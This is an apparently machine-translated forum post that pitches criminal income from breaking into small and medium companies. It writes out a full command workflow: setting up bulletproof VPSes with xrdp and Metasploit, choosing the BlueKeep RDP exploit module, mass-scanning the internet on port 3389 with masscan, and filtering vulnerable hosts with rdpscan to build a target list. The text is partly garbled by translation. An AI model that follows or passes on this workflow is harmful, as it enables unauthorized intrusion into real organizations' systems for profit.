How to earn from 1k to 100k bucks in a month with almost no investment
Today I will tell you how to become a welder with practically no investment.
We will mine entry points to small and medium-sized companies, using metasploit while investing 100 bucks in the purchase of only 2 x vps
What you need:
2 vps servers on Ubuntu (preferably bulletproof top configuration will not be needed, so 100 bucks should be enough for you)
PS you you can take any other OS I will describe the setup on ubuntu
Intro initial vps setup for working with meta
We have a clean ubuntu
we will cover xrdp + xfce shell (for me it is more convenient you can interact with the server n ssh)
Update packages
sudo apt-get update
Let's roll xrdp to work through terminal sessions
sudo apt-get install xrdp
Install the xfce shell, you can put mate, for example (but xfce works the most stable with terminal servers)
sudo apt-get install xfce4 xfce4-terminal
Let xrdp use this shell
sudo sed -i.bak '/fi/a #xrdp multiple users configuration n xfce-session n' /etc/xrdp/startwm.sh
Turn on xrpd
Soryan wrote punctuation and syntax grammar errors on the column without editing anything, if someone wants to add or record a video on this topic, throw 50-100 bucks for motivation)
sudo systemctl enable xrdp
Done now you can work with the server through a terminal session
we will install a convenient text editor gedit Install
sudo apt-get install gedit
htop to monitor the system load
sudo apt-get install htop
Install metasploit, we will not pull the database to it, we will not need to
download the metasploit curl or
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
give wget permission chmod 755 msfinstall
sudo ./msfinstall
Now when you type msfconsole in the shell, the metasploit will start.
II choice of RCE and preparation of the material
We will get our bread from this vulnerability
xttps: //en.wikipedia.org/wiki/BlueKeep
in the metasploit there is an rce for it
exploit/windows/rdp/cve_2019_0708_bluekeep_rce
This rce for the rdp protocol is extremely unstable, but brings good access)
With RCE we decided
now we need material, that is, vulnerable machines in the clearnet for Bluekeep
Ideally, if you have subnets with maxmaind and software for penetration testing from z668, it is needed exclusively for checking the RDP service so as not to waste time and miss ports everything that is not related to rdp is
best to scan random TCP ports and then check them for the rdp service
I'll show you using the standard 3389 port as an example
Install 2 more software for port scanning (masscan) and rdpscan to check for an active bluekeep
we put everything necessary for the operation of the masscan we sudo apt-get install git gcc make libpcap-dev
tighten the sorts to ourselves git clone https://github.com/robertdavidgraham/masscan
go to the directory with the masscan cd masscan we
collect in a multi- stream make -j
Download for free or buy IP addresses depots
masscan -iL ip.txt -oL res4.txt -p 3389 --rate 100000 --exclude 255.255.255.255
these parameters will take depots faila res4.txt scan the port 3389 with Reith 100,000 excluding 255.255.255.255 subnet
awk '{ print $4,$3 }' OFS=":" res4.txt > 4433.txt
will give clean results with IP output faila masskana
Put scanner vulnerability blyukip and everything necessary for its work compile scanner Launch --workers 500 (the number of workers` worth otpisalnoe number depends on your server config)
sudo apt-get install libssl-dev
sudo apt-get install build-essential
git clone https://github.com/robertdavidgraham/rdpscan.git
cd /rdpscan/
make -j
./rdpscan --workers 500 --port 3389 --file /root/rdpscan/ch2.txt grep 'VULN' | cut -f1 -d'-' >results.txt
--port 3389 the port to scan
--file /root/rdpscan/ch2.txt path to the file with
grep 'VULN' types, select only vulnerable ones and write to the file> results.txt
